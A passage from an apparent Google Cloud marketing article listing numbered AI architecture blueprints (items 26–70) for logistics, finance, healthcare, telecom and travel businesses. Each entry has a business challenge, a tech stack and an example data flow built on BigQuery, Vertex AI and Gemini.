26. Analyze large-scale telematics data for fleet optimization
Business challenge: You’re a global logistics or telematics company managing millions of connected vehicles. Your challenge is processing the immense volume of daily data points that can help you improve fleet efficiency, driver safety, and sustainability.
Tech stack: BigQuery, Vertex AI, Looker
Blueprint: Billions of data points from millions of vehicles stream directly into BigQuery daily. ➝ BigQuery ML uses that data to train models directly within the data warehouse to identify patterns related to fuel consumption, unsafe driving habits, or optimal routing. ➝ The models run continuously, analyzing new data as it arrives and outputting insights such as “vehicles on Route 88 are experiencing 15% higher fuel consumption due to traffic patterns.” ➝ These insights are visualized in a Looker dashboard, allowing fleet managers to make informed decisions on routing, driver training, and vehicle maintenance.
27. Create an AI-powered supply chain risk intelligence platform
Business challenge: You’re a global enterprise with a complex, multi-tiered supply chain. Your challenge is a lack of visibility into potential disruptions — from financial instability and labor issues to geopolitical events — deep within your supplier network, putting you at risk of costly delays and compliance failures.
Tech stack: Gemini, , Pub/Sub, BigQuery
Blueprint: The system continuously ingests data from public sources (news, social media, financial reports) via Pub/Sub. ➝ This data, along with a company’s internal supplier data, is stored and processed in BigQuery. ➝ Gemini models analyze the unstructured text data, performing sentiment analysis and entity recognition to identify potential risks associated with specific suppliers (e.g., “news reports indicate labor strikes at Factory X”). ➝ The system generates a risk score for each supplier, which is updated in real-time on a dashboard, alerting managers to potential disruptions before they impact the supply chain.
28. Build a digital twin of your distribution network
Business challenge: You’re a logistics and shipping company operating a vast, complex network of vehicles, warehouses, and sorting facilities. Your challenge is a lack of a single, real-time view of your entire operation, making it difficult to optimize routes, predict delays, and provide customers with accurate tracking information.
Tech stack: Pub/Sub, Dataflow, BigQuery, Vertex AI, Google Maps Platform
Blueprint: IoT sensors on packages, vehicles, and in facilities stream real-time location and status data to Pub/Sub. ➝ A Dataflow pipeline processes this massive stream of data, cleansing and structuring it before loading it into BigQuery. ➝ Vertex AI models use this historical and real-time data to run thousands of simulations, predicting potential bottlenecks and optimizing routes. ➝ The entire network state is visualized on a Google Maps Platform interface, creating a “digital twin” that allows operators to see the entire network at a glance and customers to track their packages with pinpoint accuracy.
29. Optimize industrial planning with 3D digital twins
Business challenge: You’re a manufacturer with complex factory layouts and supply chains. Your challenge is that optimizing facility design, production line flow, or warehouse logistics is incredibly difficult and expensive to test in the physical world.
Tech stack: Vertex AI, a 3D modeling engine, Google Cloud Storage
Blueprint: Factory assets are scanned using mobile devices or drones, capturing thousands of images. ➝ The images are uploaded to Google Cloud Storage and processed by Vertex AI Vision models to identify objects and their dimensions. ➝ This structured data is fed into a 3D modeling engine to create a photorealistic digital twin of the facility. ➝ Planners can then use this digital twin to run thousands of simulations with Gemini, asking questions like “What is the most efficient path for a robot to move from station A to station B?” to optimize processes virtually before committing to expensive physical changes.
30. Bring your employees up to speed on AI
Business challenge: You’re a manufacturing company with a wealth of operational knowledge about the factory floor, but your expert workers lack the coding skills to build AI solutions. Your challenge is finding a way to make it easy to give your frontline teams ways to solve their own problems with AI, so they can improve efficiency and quality control.
Tech stack: Vertex AI, BigQuery, a simplified user interface (e.g., built on App Engine)
Blueprint: Factory sensor and quality control data is collected and stored in BigQuery. ➝ A simple, no-code user interface is created where a factory worker can select a dataset and define a goal, such as “Predict which parts are likely to have a defect based on these sensor readings.” ➝ The interface calls the Vertex AI AutoML API, which automatically trains, tests, and deploys a custom machine learning model without the worker writing any code. ➝ The deployed model can then be used in real-time on the production line to flag potential issues, directly improving efficiency.
31. Build an AI-powered sales assistant for e-commerce
Business challenge: You’re a retailer with a sophisticated online storefront. Your challenge is that customers often have nuanced questions or need guidance that a simple search bar or FAQ can’t provide, leading to abandoned carts and missed sales opportunities.
Tech stack: Vertex AI, BigQuery, Cloud Run
Blueprint: Your entire product catalog and customer interaction history are indexed from BigQuery into Vertex AI Agent Builder. ➝ When a customer interacts with the chat assistant on your website, their query is sent to a service on Cloud Run. ➝ The service uses the Agent Builder to understand the user’s intent and retrieve relevant product information. ➝ For complex or conversational queries, the retrieved information is passed to Gemini with a prompt like, “A customer is asking for a durable, family-friendly car. Based on these three models, explain which is the best fit and why.” ➝ Gemini generates a helpful, conversational response that guides the customer to the right product, increasing conversion.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e54089622b0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
These architectural blueprints are inspired by customers who are using AI in the financial services industry, such as: Bud Financial, Deutsche Bank, Discover Financial, Scotiabank, and more.
32. Automate banking tasks with a financial LLM
Business challenge: You’re a neobank or financial institution serving a digitally native customer base. Your challenge is that customers expect intelligent and proactive service that traditional banking workflows can’t provide, such as automatically preventing an overdraft.
Blueprint: Real-time transaction data streams into Pub/Sub and is analyzed by a Cloud Function ➝ If a potential overdraft is detected, the function calls a fine-tuned Gemini model (a Financial LLM) with a prompt like, “This user is about to overdraft. Based on their account history, suggest the best action.” ➝ Gemini might respond with, “Move $50 from their ‘Savings’ account.” ➝ The system can then either automatically execute the transfer or send a proactive notification to the user, preventing the fee and improving their financial health.
33. Create an AI mortgage agent to personalize quotes
Business challenge: You’re a digital mortgage lender in a highly competitive market. Your challenge is that potential borrowers are often comparison shopping and will abandon your site if they can’t get a fast, clear, and personalized rate quote without a lengthy application process.
Tech stack: Vertex AI, Cloud Run, a secure document store (e.g., Cloud Storage).
Blueprint: A borrower uses a feature like “Beat this Rate” and uploads a competitor’s quote sheet to Cloud Storage. ➝ The document is sent to a service on Cloud Run, which calls a multimodal Gemini model. ➝ Gemini extracts the key terms (rate, points, term length) from the document. ➝ The service uses this data to query internal rate tables and constructs a new prompt for Gemini, such as “Create a comparison table and a friendly chat message showing how our 2.95% rate is better than this competitor’s 3.15% rate.” ➝ The personalized quote and comparison are displayed to the borrower in seconds.
34. Build an AI agent to enhance wealth management advisory
Business challenge: You’re a wealth management firm where financial advisors spend significant time on administrative tasks like writing call summaries. Your challenge is freeing up advisors from this manual work so they can focus on high-value client relationship building and strategic advice.
Tech stack: Speech-to-Text API, Vertex AI, a CRM system.
Blueprint: During a client call, the audio is transcribed in real-time by the Speech-to-Text API. ➝ After the call, the full transcript is sent to a Gemini model with a prompt like, “Summarize this financial advisory call. Identify key client concerns, action items for the advisor, and update the client’s financial goals.” ➝ Gemini generates a structured summary and a list of action items. ➝ This summary is automatically logged into the firm’s CRM system, saving the advisor significant time and ensuring a consistent record of every interaction.
35. Accelerate underwriting with AI-powered document analysis
Business challenge: You’re a mortgage lender or broker dealing with thousands of loan applications. Your challenge is the slow, manual process of underwriting, where humans must read through complex financial documents, leading to long closing times and high operational costs.
Blueprint: A broker uploads a borrower’s financial documents (pay stubs, bank statements) to a portal. ➝ A service on Cloud Run sends the documents to Document AI to extract and structure all the raw data (income, assets, debts). ➝ The structured data is stored in BigQuery and sent to a Gemini model with a prompt like, “Analyze this borrower’s financial data against our underwriting guidelines and flag any potential risks.” ➝ The model returns a risk analysis, allowing a human underwriter to make a final decision in minutes instead of hours, dramatically increasing productivity.
36. Automate international transfers via a chat interface
Business challenge: You’re a financial institution specializing in currency exchange. Initiating international transfers often requires customers to navigate complex online forms or visit a branch during business hours, creating a slow and inconvenient experience.
Tech stack: A chat platform API, Dialogflow CX (or Vertex AI Conversation), Cloud Functions.
Blueprint: A customer starts a conversation and says, “I want to send $500 to my brother in the UK.” ➝ The message is sent to a Dialogflow CX agent, which is trained to handle transfer requests. ➝ The agent asks clarifying questions (e.g., “What is the recipient’s bank information?”). ➝ Once all the necessary information is collected, Dialogflow calls a secure Cloud Function. ➝ The Cloud Function executes the transfer via the bank’s core systems and sends a confirmation message back to the customer through the chat interface, completing the entire transaction 24/7 without human intervention.
37. Build an AI research assistant for financial analysts
Business challenge: You’re a financial institution where analysts spend hours, or even days, gathering data and synthesizing information to produce research reports. Your challenge is accelerating this process to deliver more timely insights to clients while maintaining the highest standards of data privacy.
Tech stack: Vertex AI, BigQuery.
Blueprint: A financial analyst uses an internal research tool and gives it a prompt like, “Draft a research note on the semiconductor industry’s Q3 performance, focusing on supply chain trends and key player earnings.” ➝ The tool queries internal, proprietary datasets in BigQuery and external, approved market data sources using Vertex AI Search. ➝ The retrieved data is passed to a Gemini model with a detailed prompt to generate a draft report. ➝ The model produces a structured draft with key insights, charts, and summaries, allowing the analyst to refine and finalize the report in minutes instead of days.
38. Automate insurance claims processing with multimodal AI
Business challenge: You’re an insurance provider, and your claims process relies on adjustors manually reviewing various documents (photos, repair estimates, police reports). This is slow, error-prone, and leads to a poor customer experience during a stressful time.
Tech stack: Document AI, Vertex AI, Cloud Run.
Blueprint: A claimant uploads all their documents and photos for a claim. ➝ A service on Cloud Run sends text documents to Document AI and images to Vertex AI Vision to extract and structure all relevant information. ➝ This structured data is then passed to a Gemini model with a prompt like, “Based on this police report, repair estimate, and photos of the damage, is this auto claim valid under policy #12345? Calculate the estimated payout.” ➝ The model returns a validation decision and payout amount, allowing simple claims to be settled in near real-time.
39. Build an AI agent to extract data from legal documents
Business challenge: You’re a financial advisory or wealth management firm. Your challenge is the time-consuming and highly manual process of reading through lengthy, complex legal documents like wills and trusts to extract key information for estate planning.
Tech stack: Document AI, Vertex AI.
Blueprint: A financial advisor uploads a client’s lengthy trust document (a PDF). ➝ The document is processed by Document AI to extract all the raw text while preserving its structure. ➝ The extracted text is then sent to a fine-tuned Gemini model with a prompt like, “From this trust document, extract the beneficiaries, trustees, asset distribution rules, and any specific conditions for inheritance.” ➝ The model returns the key information in a structured format (like JSON), which can be used to automatically populate the client’s profile in the planning platform, saving the advisor hours of manual reading.
Business challenge: You’re a software company in a regulated industry, and your developers spend significant time translating bug reports or feature requests from project management tickets into actual code, slowing down the development cycle.
Tech stack: Vertex AI, a project management tool API (e.g., Jira).
Blueprint: When a new bug ticket is created in Jira, a webhook triggers a service. ➝ The service retrieves the ticket’s description, which details the bug (e.g., “The ‘export’ button is not working on the user dashboard for accounts in ‘pending’ status.”). ➝ This description is used to construct a detailed prompt for Gemini Code Assist, which has been trained on the company’s private codebase. ➝ The prompt is, “Given our codebase, write the Python code to fix the bug described in this ticket.” ➝ The model generates a code snippet or a pull request with the suggested fix, which a developer can then review, test, and merge, significantly speeding up the process.
41. Build an anti-fraud and credit analysis engine
Business challenge: You’re a fintech company providing payment solutions or loans. Your challenge is accurately assessing credit risk and detecting fraudulent transactions in real-time to protect both your business and your customers, without slowing down the user experience.
Tech stack: BigQuery, Vertex AI, Dataflow.
Blueprint: Real-time transaction and user behavior data streams through Dataflow and is stored in BigQuery. ➝ Vertex AI machine learning models are continuously trained on this historical data to learn the patterns of both legitimate and fraudulent activity. ➝ When a new transaction occurs, the data is sent to the deployed fraud detection model in real-time. ➝ The model returns a risk score in milliseconds. ➝ If the score is high, the transaction can be automatically blocked or flagged for manual review, preventing fraud before it happens.
These architectural blueprints are inspired by customers who are using AI in the healthcare and life sciences industry, such as: Bayer, Mayo Clinic, Clivi, Orby, Hackensack Meridian Health, and more.
42. Enable personalized and continuous patient monitoring
Business challenge: You’re a healthcare provider managing a large population of patients with chronic conditions like diabetes. Your challenge is that periodic check-ins don’t provide a complete picture of a patient’s health, making it difficult to offer timely, personalized advice or intervene before complications arise.
Blueprint: Real-time patient data from sources like glucose monitors is streamed to Pub/Sub ➝ A Dataflow pipeline processes and normalizes the data, storing it in BigQuery against the patient’s record ➝ The system uses a Vertex AI model to analyze trends, and if an anomaly is detected (e.g., consistently high blood sugar), it triggers an alert ➝ Gemini then generates a personalized message for the patient, like “We’ve noticed your glucose levels have been high in the evenings. Try a short walk after dinner and let’s see how your numbers look tomorrow.”
43. Build an AI assistant for radiology workflows
Business challenge: You’re a healthcare provider, and your radiologists are facing immense pressure from increasing workloads. Your challenge is helping them analyze complex images, search for relevant prior studies, and create regulatory-compliant reports more efficiently and accurately.
Tech stack: Vertex AI, Google Cloud Healthcare API, PACS system.
Blueprint: A new radiology image is ingested and de-identified via the Healthcare API and stored in a PACS. ➝ The image is sent to a Vertex AI vision model to detect and highlight potential areas of interest ➝ A radiologist can use Vertex AI Search, which is indexed on millions of prior anonymized studies, to find similar cases ➝ After review, the radiologist dictates their findings, and Gemini helps draft a structured, compliant report, which is then finalized and logged, freeing up the radiologist to focus on complex diagnostic work.
44. Create a virtual assistant for caregiver shift handoffs
Business challenge: You’re a large healthcare network, and a critical point of failure is the shift change between nurses or caregivers. Your challenge is ensuring that crucial context and patient status details are not lost during this handoff, which can impact the continuity and quality of care.
Tech stack: Speech-to-Text API, Vertex AI, an Electronic Health Record (EHR) system.
Blueprint: As a nurse ends their shift, they speak into a device and summarize their patient’s status. ➝ Speech-to-Text transcribes their summary in real-time. ➝ The transcript is sent to Gemini with a prompt like, “Convert this unstructured shift summary into a structured report with sections for ‘Vitals’, ‘Medication Administered’, ‘Patient Observations’, and ‘Action Items for Next Shift’.” ➝ The structured summary is automatically placed in the patient’s EHR, allowing the incoming caregiver to get a complete and consistent overview in seconds. For a more detailed example, check out this blog.
45. Accelerate drug discovery with generative protein design
Business challenge: You’re a biotech or pharmaceutical company, and the traditional process of drug discovery is incredibly slow and expensive. Your challenge is finding a way to rapidly design and test novel proteins that could become the basis for new medicines.
Tech stack: Vertex AI, Google Cloud TPUs.
Blueprint: Scientists input the desired properties of a protein (e.g., “Design a protein that binds to target X to inhibit its function”). ➝ This request is sent to a generative AI model running on high-performance TPUs on Google Cloud. ➝ The model, trained on vast biological datasets, generates sequences for thousands of novel proteins that meet the specified criteria. ➝ These AI-designed proteins can then be synthesized and tested in the lab, drastically shortening the initial R&D phase from years to weeks.
46. Automate pharmaceutical documentation and formatting
Business challenge: You’re a pharmaceutical company that deals with a high volume of complex documents, from lab results to FDA compliance paperwork. Your challenge is the time-consuming, manual process of transcribing, formatting, and summarizing this information, which slows down operations.
Tech stack: Gemini for Google Workspace, Document AI.
Blueprint: A lab result arrives as a PDF attachment in an employee’s inbox. ➝ The employee uses Gemini in Gmail with a prompt like, “Extract the key values from this attached lab result and format them into the standard table in this Google Doc template.” ➝ Gemini leverages Document AI capabilities to parse the PDF, extract the structured data, and populate the Google Doc. ➝ This reduces a multi-step manual process into a single command, saving hours per week.
47. Build an AI-enhanced underwriting model for insurers
Business challenge: You’re a commercial insurer, and quoting policies for complex risks requires underwriters to manually assess vast amounts of data, a process that can take days. Your challenge is to automate and accelerate this process to provide faster quotes and gain a competitive edge.
Tech stack: BigQuery, Vertex AI, Cloud Run.
Blueprint: Historical data on leads, quotes, and claims outcomes is stored and processed in BigQuery. ➝ This data is used to train a Vertex AI machine learning model to predict the risk associated with a new lead. ➝ When a new request for a quote arrives, the data is sent to a service on Cloud Run. ➝ The service calls the deployed Vertex AI model, which returns a risk score and a suggested premium in seconds. ➝ This automates the initial assessment, allowing a human underwriter to review the AI-generated quote and make a final decision in minutes instead of days.
48. Build an intelligent search platform for clinical research
Business challenge: You’re a large research hospital or institution with petabytes of valuable clinical data. Your challenge is that this data is often siloed and difficult for researchers to access and analyze, creating a major roadblock to scientific discovery.
Tech stack: Vertex AI Search, BigQuery, Google Cloud Healthcare API.
Blueprint: Petabytes of clinical data are de-identified using the Healthcare API and consolidated into BigQuery. ➝ The entire dataset, including unstructured notes and structured data, is indexed into Vertex AI Search. ➝ A researcher can now use a simple, natural language search bar to ask complex questions like, “Find all patient cohorts over the age of 50 with a history of heart disease who responded positively to drug X.” ➝ Vertex AI Search retrieves the relevant, anonymized records from across the entire 50-petabyte dataset, accelerating research from months to minutes.
49. Predict disease outbreaks with public and private data
Business challenge: You’re a pharmaceutical company or public health organization. Your challenge is to move from reacting to seasonal outbreaks like the flu to proactively predicting them, allowing for better resource planning, vaccine distribution, and public health messaging.
Tech stack: BigQuery, Vertex AI, Google Trends API.
Blueprint: Anonymized, aggregated Google Search trend data (via the Trends API) for terms like “fever” and “cough” is combined with internal historical sales data for flu medication in BigQuery. ➝ A Gemini model is used to analyze these combined datasets to identify correlations and predict future outbreaks on a location-specific basis. ➝ The system generates a forecast, such as “A 20% increase in search traffic for ‘flu symptoms’ in Ohio predicts a spike in cases in 7-10 days.”, which is then visualized on a dashboard for real-time healthcare planning.
50. Enhance IVF outcomes with AI-powered embryo analysis
Business challenge: You’re a fertility clinic, and one of the most critical and difficult parts of the IVF process is selecting the embryo with the highest chance of a successful pregnancy. Your challenge is improving the accuracy of this selection process to give patients the best possible outcomes.
Tech stack: Vertex AI, Google Cloud Storage.
Blueprint: High-resolution images of embryos are uploaded to Google Cloud Storage. ➝ A Vertex AI Vision model analyzes the images, extracting hundreds of morphological features that are imperceptible to the human eye. ➝ This feature data, along with the eventual outcome data (successful implantation or not), is used to train an AutoML model. ➝ When analyzing a new patient’s embryos, the model provides a viability score for each one, helping embryologists make a more data-driven decision and increasing the likelihood of a successful IVF cycle.
51. Automate routing and medical order processing for home health
Business challenge: You’re a home health company managing a fleet of nurses who conduct thousands of patient visits. Your challenge is optimizing their daily routes to be as efficient as possible while also speeding up the manual, paper-based process of handling medical orders.
Blueprint: A patient’s medical order (PDF or image) is uploaded to the system. ➝ A service on Cloud Run sends the file to Document AI, which automatically extracts the patient details, required services, and location. ➝ Each day, the system sends the list of all required visits to the Google Maps Routes API, which calculates the most efficient multi-stop route for each nurse. ➝ The optimized route is sent to the nurse’s mobile app, saving time and fuel, while the automated order processing reduces administrative overhead.
These architectural blueprints are inspired by customers who are using AI in the telecommunication industry, such as: Bell Canada, Verizon, Vodafone, Nokia, Orange, and more.
52. Build a customizable AI contact center solution
Business challenge: You’re a telecommunications provider serving business customers who need to modernize their own customer service. Your challenge is providing a flexible, AI-powered contact center solution that can both handle calls automatically and assist human agents in real-time.
Tech stack: Contact Center AI Platform (CCAI), Vertex AI, a CRM system.
Blueprint: When a customer calls, they are first greeted by an AI-powered agent built on Contact Center AI. ➝ The agent handles common requests, such as checking an account balance. ➝ If the caller needs to speak to a human, the call is transferred. ➝ As the human agent speaks, the “Agent Assist” feature listens to the conversation, transcribes it in real-time, and uses Gemini to provide the agent with relevant knowledge base articles and next-step suggestions directly in their CRM interface.
53. Empower your workforce with generative AI tools
Business challenge: You’re a large telecommunications company, and you want to empower your entire workforce with AI. Your challenge is providing easy access to generative AI tools while maintaining strict security, privacy, and compliance controls over your sensitive company data.
Tech stack: Vertex AI, Identity and Access Management (IAM), Google Cloud Storage.
Blueprint: An internal “AI Sandbox” platform is built using Vertex AI Agent Builder. ➝ The platform is grounded on a curated set of internal company documents (legal, HR, technical docs) stored securely in Google Cloud Storage. ➝ Employees access the sandbox through their corporate identity, with IAM rules ensuring they can only access data they are permissioned to see. ➝ An employee can then ask questions like “Summarize our new data privacy policy” and receive an answer from Gemini that is based solely on the trusted internal documents, democratizing information securely.
54. Automate call summarization and quality assurance
Business challenge: You’re a telecom operator with a large customer service center. Your challenge is ensuring consistent quality and identifying best practices from thousands of daily calls, a task that requires managers to manually listen to a small, random sample of call recordings.
Blueprint: Audio from all customer service calls is transcribed by the Speech-to-Text API, and the text is stored in BigQuery. ➝ A scheduled job sends the transcripts to Gemini with a prompt like, “Summarize this call, classify the customer’s reason for calling, and rate the agent’s effectiveness based on our quality rubric.” ➝ The structured analysis is written back to BigQuery. ➝ Managers use a Looker dashboard to see trends, identify top-performing agents, and find calls that can be used as examples for team training.
55. Use AI to analyze complex commercial contracts
Business challenge: You’re a global telecommunications operator with thousands of complex interconnection agreements and vendor contracts. Your challenge is quickly finding specific commercial terms, obligations, or renewal dates buried within these dense legal documents.
Tech stack: Document AI, Vertex AI Search, Vertex AI.
Blueprint: Thousands of contracts are processed by Document AI to extract and structure the raw text, which is then indexed into Vertex AI Search. ➝ A member of the legal or commercial team uses a search interface and asks a natural language question like, “Find all contracts with Operator X that have a termination clause requiring 90 days’ notice.” ➝ Vertex AI Search retrieves the relevant contract sections. ➝ For further analysis, Gemini can be used to compare terms across multiple retrieved documents in a side-by-side table.
56. Build a “network as code” platform for developers
Business challenge: You’re a 5G network operator, and you want to enable developers to create innovative applications that leverage the unique capabilities of your network (e.g., low latency, high bandwidth). Your challenge is abstracting the complexity of the network into simple, programmable APIs.
Tech stack: Vertex AI, Google Kubernetes Engine (GKE), network APIs.
Blueprint: A “Network as Code” platform exposes complex network functions via simple APIs, hosted on GKE. ➝ A developer wants to build a telehealth app that requires a guaranteed high-quality connection for a remote surgery consultation. ➝ They use the platform’s SDK and interact with a Gemini-powered assistant, prompting, “Generate the Python code to request a dedicated, low-latency network slice between the hospital and the patient’s home for the next 60 minutes.” ➝ Gemini generates the necessary code, which calls the platform’s APIs to provision the network resources dynamically.
57. Create a unified customer view for enhanced service
Business challenge: You’re a large telecom provider, and your customer data is fragmented across multiple systems (billing, CRM, network usage). Your challenge is creating a single, 360-degree view of each customer to provide proactive, personalized service and make informed business decisions.
Blueprint: Data from all source systems is streamed via Dataflow into BigQuery, which acts as the central data warehouse. ➝ Vertex AI models analyze the unified data to identify patterns, such as a customer experiencing poor network quality in a specific location. ➝ The system can then create an actionable insight, like “This customer is at high risk of churn due to repeated dropped calls.” ➝ This insight is surfaced to a customer service agent via a Looker dashboard, prompting them to proactively reach out with a solution, like offering a network extender.
58. Enable natural language chat for complex IoT data
Business challenge: You’re an Internet of Things (IoT) provider for commercial clients, collecting millions of data points from sensors and devices. Your challenge is that non-technical users, like fleet managers or building operators, cannot easily access or understand this complex data to get the insights they need.
Tech stack: BigQuery, Vertex AI, Looker (or another BI tool).
Blueprint: All IoT data is streamed and stored in BigQuery. ➝ The data is exposed through a BI tool like Looker with an embedded natural language chat interface. ➝ A non-technical user asks a question in plain English, such as “Which of our vehicles have been idling for more than 30 minutes today in the downtown area?” ➝ The request is sent to Gemini, which understands the user’s intent and translates the question into a SQL query. ➝ The query is run against BigQuery, and the results are returned as a simple table or map directly in the chat interface, reducing time-to-insight by 88%.
59. Deliver AI services on a distributed cloud for data sovereignty
Business challenge: You’re a multinational telecom operator serving countries with strict data residency laws. Your challenge is to leverage powerful AI capabilities, like real-time translation, while ensuring that local customer data never leaves the country of origin.
Tech stack: Google Distributed Cloud, Vertex AI, Speech-to-Text, Text-to-Speech.
Blueprint: An instance of Google Distributed Cloud (GDC) is deployed within the local country’s data center. ➝ A user makes a call that requires real-time translation. ➝ The audio stream is processed entirely within the GDC environment. ➝ Speech-to-Text and Text-to-Speech services, along with Vertex AI translation models running on GDC, handle the translation. ➝ The translated audio is sent back to the user with super-low latency, delivering the AI service while guaranteeing all data remains in-country to comply with sovereignty regulations.
60. Accelerate cybersecurity threat detection and response
Business challenge: You’re a critical infrastructure provider, and you face a constant barrage of sophisticated cyber threats. Your challenge is detecting and investigating these threats fast enough to prevent breaches, a task that is difficult for human analysts to manage at scale.
Tech stack: Google Security Operations (SecOps), Gemini in Security.
Blueprint: Security logs and telemetry from across the entire organization are ingested into the Google Security Operations platform. ➝ The platform’s AI capabilities automatically correlate signals to detect potential threats that a human might miss. ➝ When a high-priority event is detected, a security analyst can use the integrated Gemini in Security to ask, “Summarize this threat. What is the potential impact, and what is the recommended remediation?” ➝ Gemini provides a concise summary and a step-by-step playbook, allowing the analyst to close investigations faster.
61. Establish data-driven AI security governance
Business challenge: You’re a large enterprise with thousands of internal developers and data scientists building AI models. Your challenge is establishing a robust governance layer to ensure that all AI development is secure, compliant, and data-driven without stifling innovation.
Tech stack: Vertex AI, BigQuery, open-source tools (e.g., for model scanning), IAM.
Blueprint: All AI model development is done within Vertex AI. ➝ As models are built, their metadata, training data sources, and dependencies are automatically logged in BigQuery. ➝ Automated security tools scan models for vulnerabilities. ➝ A governance dashboard provides a single view of all AI projects, showing compliance status and data lineage. ➝ IAM policies enforce rules, such as “a model cannot be deployed to production if it was trained on unapproved customer data,” creating a robust, data-driven governance framework.
These architectural blueprints are inspired by customers who are using AI in the hospitality and travel industry, such as: Alaska Airlines, Gymshark, Priceline, Six Flags, Studiosus Reisen, trivago, and more.
62. Build a conversational AI travel agent
Business challenge: You’re an airline or online travel agency. Your challenge is that traditional booking websites with complex filters and forms can be frustrating and impersonal for travelers who just want to ask a simple question, leading to abandoned searches and lost bookings.
Tech stack: Vertex AI, Cloud Run, backend booking system APIs.
Blueprint: A traveler interacts with a chatbot on the website or app, asking, “I want to fly from Seattle to Miami next month for about $400.” ➝ The request is sent to a service on Cloud Run, which uses Vertex AI Agent Builder to understand the user’s intent and extract entities (origin, destination, date, price). ➝ The service calls the airline’s booking APIs to find matching flights. ➝ The flight options are passed to Gemini with a prompt like, “Here are three flights. Present them in a friendly, conversational way and ask the user which one they prefer.” ➝ The chatbot presents the options, streamlining the booking process into a simple conversation.
63. Create an in-park digital assistant for theme parks
Business challenge: You’re a theme park or large entertainment venue operator. Your challenge is that guests can feel overwhelmed trying to navigate the park, find showtimes, and check ride wait times, which can detract from their overall experience.
Tech stack: Google Maps Platform, Vertex AI, BigQuery, Cloud Run.
Blueprint: Real-time park data (ride wait times, show schedules, character locations) is streamed into BigQuery. ➝ A guest opens the park’s mobile app and asks the digital assistant, “What’s a fun ride with a wait time under 20 minutes near me?” ➝ The app sends the request and the user’s location to a service on Cloud Run. ➝ The service queries BigQuery for current wait times and uses the Google Maps Platform to find nearby attractions. ➝ Gemini synthesizes this information to provide a personalized recommendation, such as, “The Goliath roller coaster is a 5-minute walk from you and has a 15-minute wait!”
64. Build predictive tools for food orders and loyalty
Business challenge: You’re a quick-service restaurant or pizza chain. Your challenge is managing inventory and kitchen prep time effectively during peak hours while also encouraging repeat business through generic loyalty programs that often fail to engage customers.
Tech stack: BigQuery, Vertex AI, Cloud Run.
Blueprint: All historical order data is stored in BigQuery. ➝ Vertex AI forecasting models analyze this data to predict order volumes for specific times and locations (e.g., “Predict a 30% spike in pepperoni pizza orders in downtown locations on Friday night”). ➝ When a loyalty member opens the app, a service on Cloud Run retrieves their order history and sends it to Gemini with a prompt like, “This user frequently orders on Tuesdays. Create a personalized offer for a free side item with their next Tuesday order.” ➝ This predictive prep and personalized marketing increases efficiency and customer loyalty.
65. Enable natural language search for accommodations
Business challenge: You’re a hotel booking platform or vacation rental site. Your challenge is that users often have specific, nuanced needs (like “a quiet hotel near the beach with a pool for kids”) that are difficult to express using standard check-box filters.
Tech stack: Vertex AI Search, BigQuery.
Blueprint: Detailed data for millions of hotel listings, including amenities, reviews, and location info, is indexed from BigQuery into Vertex AI Search. ➝ A user types a free-text query like, “Find me a pet-friendly hotel in downtown Austin with a rooftop bar for under $300 a night.” ➝ Vertex AI Search processes the natural language to understand the multiple intents (pet-friendly, location, amenity, price). ➝ The engine returns a ranked list of hotels that best match all the specified criteria, creating a more intuitive and personalized search experience.
66. Create an AI-driven virtual fitness coach
Business challenge: You’re a fitness brand or gym, and your customers want personalized training plans. Your challenge is that providing one-on-one human coaching is expensive and doesn’t scale, leaving most members with generic, one-size-fits-all workout programs.
Tech stack: Vertex AI, a mobile application, wearable device integration.
Blueprint: A user inputs their fitness goals and performs a series of assessment exercises, which are recorded through their phone’s camera. ➝ A computer vision model on Vertex AI analyzes the video to assess form and fitness level. ➝ This data, along with input from their wearable device, is sent to a Gemini model with a prompt like, “Create a 4-week progressive fitness program for a user with intermediate strength whose goal is fat loss.” ➝ The AI generates a hyper-personalized daily workout program, acting as a virtual trainer that adapts over time based on the user’s performance.
67. Personalize advertising campaigns at scale
Business challenge: You’re a global hotel group, and you need to run advertising campaigns across many different regions and customer segments. Your challenge is creating ad copy and imagery that resonates with each specific audience, a task that is slow and difficult to scale manually.
Tech stack: BigQuery, Vertex AI, Google Ads API.
Blueprint: Customer and campaign performance data is consolidated in BigQuery. ➝ The marketing team defines a new campaign with a target audience, such as “families looking for a summer vacation in Spain.” ➝ A service sends this context to Gemini with a prompt like, “Generate 5 different ad headlines and descriptions for a family-friendly hotel in Barcelona, highlighting the pool and proximity to attractions.” ➝ Gemini creates multiple ad variations, which are then automatically pushed to the Google Ads API to create a highly targeted and personalized campaign, boosting ad team productivity and revenue.
68. Automate data governance for airline operations
Business challenge: You’re a major airline dealing with petabytes of data from dozens of systems, from flight operations to customer loyalty. Your challenge is managing and governing this data, as manually classifying tables and managing metadata is a massive, costly, and error-prone undertaking.
Tech stack: BigQuery, Gemini, Dataplex.
Blueprint: As new data tables are created in BigQuery, a process is triggered. ➝ The table schema and sample data are sent to a Gemini model with a prompt like, “Analyze this table and generate a business-friendly description, assign data quality rules, and classify any columns that contain PII.” ➝ The model returns structured metadata. ➝ This metadata is used to automatically populate the Dataplex data catalog, ensuring all data is properly documented, classified, and governed without significant manual effort.
Business challenge: You’re a tour operator responsible for the safety of thousands of travelers around the world. Your challenge is monitoring and filtering a high volume of global security alerts to identify the ones that pose an actual, immediate risk to your specific customers.
Tech stack: Vertex AI, Pub/Sub, a traveler itinerary database.
Blueprint: A stream of global security alerts from various news and government sources flows into Pub/Sub. ➝ For each alert, a function is triggered that retrieves the location and topic. ➝ The function queries the itinerary database to see if any travelers are currently in the affected area. ➝ If there are, the alert text is sent to Gemini with a prompt like, “Based on this alert about a protest in Paris, classify the risk level for a tourist located 5 miles away as ‘Low’, ‘Medium’, or ‘High’.” ➝ The classified alert appears on a security dashboard, allowing the team to ignore low-risk noise and focus only on credible threats, reducing manual effort.
70. Streamline guest services with an AI data analyst
Business challenge: You’re a property manager for vacation rentals or corporate housing. Your challenge is that new arrivals frequently call with the same set of questions (e.g., “What’s the wifi password?”, “How does the thermostat work?”), overwhelming your support staff.
Tech stack: Gemini for Google Workspace, a call logging system.
Blueprint: All support call logs and transcripts are consolidated into a central Google Sheet. ➝ A manager uses the integrated Gemini feature with a prompt like, “Analyze all the calls from the last 30 days and identify the top 5 most common questions asked by new arrivals.” ➝ Gemini analyzes the text and returns a summary, revealing that “Wifi password” is the most common issue. ➝ The business can then take proactive steps, like sending a more prominent welcome email with the wifi details, leading to a reduction in these repetitive calls.
